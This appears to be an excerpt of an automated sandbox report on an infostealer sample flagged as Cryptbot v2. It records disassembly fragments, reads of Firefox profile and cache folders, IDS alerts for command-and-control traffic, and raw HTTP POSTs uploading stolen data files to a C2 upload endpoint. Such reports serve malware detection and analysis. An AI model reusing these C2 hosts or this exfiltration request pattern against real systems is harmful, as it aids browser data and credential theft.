Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 8_2_008C15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
8_2_008C15B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 8_2_6C0B14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
8_2_6C0B14B0 |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
8_2_008C81E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C12AEC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C12AF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C12AF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C0D0860 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C0DA970 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 2Ch |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
8_2_6C1749A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C0DA9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C0DA9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C18F960h |
8_2_6C0CEB10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
8_2_6C1584A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C0D44B4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C0DC510 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C0DA580 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C0DA5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C0DA5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C0DE6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C0DE6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
8_2_6C150730 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C0D0740 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C12C040 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C12C1A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
8_2_6C10A1E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C0D0260 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6C18D014h] |
8_2_6C184360 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C12BD10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C127D10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
8_2_6C123840 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
8_2_6C0DD974 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C0EBBDB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C0EBBD7 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C12B4D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C0DD504 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
8_2_6C129600 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
8_2_6C0DD674 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C18DFF4h |
8_2_6C123690 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
8_2_6C0DD7F4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
8_2_6C153140 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C0CB1D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C0DD2A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
8_2_6C147350 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49765 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49766 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49750 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49749 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49744 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49741 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49742 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49743 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49767 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49746 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49747 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49764 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49745 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49763 -> 34.116.198.130:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49748 -> 34.116.198.130:80 |
Source: global traffic |
HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */* |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 63867Content-Type: multipart/form-data; boundary=------------------------8kQXZUrNXOoyZ27swMPHfuData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 6b 51 58 5a 55 72 4e 58 4f 6f 79 5a 32 37 73 77 4d 50 48 66 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 7a 75 7a 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 23 5d 6a f6 b8 c2 be 6c 20 32 3d 80 8b a2 45 40 50 52 a2 03 2d 9a 8a 68 b7 09 c3 ad fa 2d 9e 6b cd a6 76 eb 3d 5c bb d0 ae e7 3c f0 c1 9a ae 99 20 05 19 25 80 d4 38 96 df 76 e2 e0 f9 7f 6c f0 d0 3e e7 a8 fb 57 bf 4f 9e d9 f2 e9 30 af c8 14 1c da 53 09 16 50 30 71 11 cf a4 e7 c2 8f e9 2f b5 d9 49 34 00 16 52 e7 ce 3b de e7 33 a4 90 a8 4a 6c 45 dc 3b 47 e0 7e fb 17 e6 71 e8 8d 59 0c 1c 3b 56 34 56 34 5d 1b ca 18 e8 b4 9e d1 5c 54 20 86 43 36 fe d4 4b e2 9b 67 d6 85 0f ed 2f 7a c8 2c c4 5f 94 44 d4 9c 86 71 3b ee 22 a7 e1 af 47 be cf dc fc 13 bd e0 89 9d e4 c1 f1 63 94 12 00 b7 96 56 fc e5 5f fd 5d f2 e4 fc fa b8 4b 8d 9e 54 6f 7b b7 cd 7a 15 47 77 59 af 98 ab e9 6c 8a 7a 4b 6a 70 18 a3 cc 41 3b 15 a6 5e ea 9f ac 1c c1 10 1c 00 b5 67 4f 51 7b 3a b5 d8 79 85 91 86 7a ce 22 23 72 22 3a 3d 00 66 22 97 9d d0 6f d4 16 8a 8a 36 9a b8 b3 2d 0a bd 51 eb fb b7 69 e0 ec d1 51 47 89 4a 36 60 23 d8 31 42 5b 1f 0f f7 7e 37 56 b2 d9 73 21 8f 2c 68 5b 36 62 01 be 61 56 cc a5 d7 51 de 17 0f 5f 3b 7b c0 a2 a5 51 c4 28 bf d1 06 41 14 97 e3 41 6d cf 71 cb 73 99 4f 66 5e 8f df 29 1e 3f 6a 19 9e fb ff 27 51 10 12 db 15 b7 1f ab e0 1e 5d ee d9 5e a5 63 46 3d 46 72 59 12 87 47 64 f7 b7 f1 e8 88 58 9d 16 b0 83 87 e1 51 8d c1 b0 82 cb c9 88 10 f7 d2 76 b6 7d 18 a8 a6 44 ed 3c 6c a2 a1 25 96 37 eb c8 5b fa e3 bc 95 bf bb 60 a4 4b 0c ee 59 2c 87 2d 6d 14 4e 4a f4 28 d9 fd 97 13 3f 35 ae 5c 38 22 72 de 9e 39 3c 45 cb da 29 30 fe 15 48 9b 27 0c 2b 7e c8 5f d9 6d c6 d3 c4 66 07 d6 16 55 75 25 22 f7 36 ab 4e 3b eb 88 d5 0c 4e 07 66 ea fd 2e ee 03 19 cf d3 84 bd 6e 37 d3 ef 03 26 8d 90 2b 64 57 eb 90 bf 20 b0 e7 34 5f ff cf d7 4b 53 66 ae df e3 16 f4 fe ca 0d 23 d4 23 48 e6 89 9d c3 be 99 fd 2b d8 30 85 a0 35 51 46 8a 45 0b d2 e5 ca 3c d5 2e 1b 78 98 2a e0 c1 1a f7 cb 90 36 56 92 09 6e f2 de |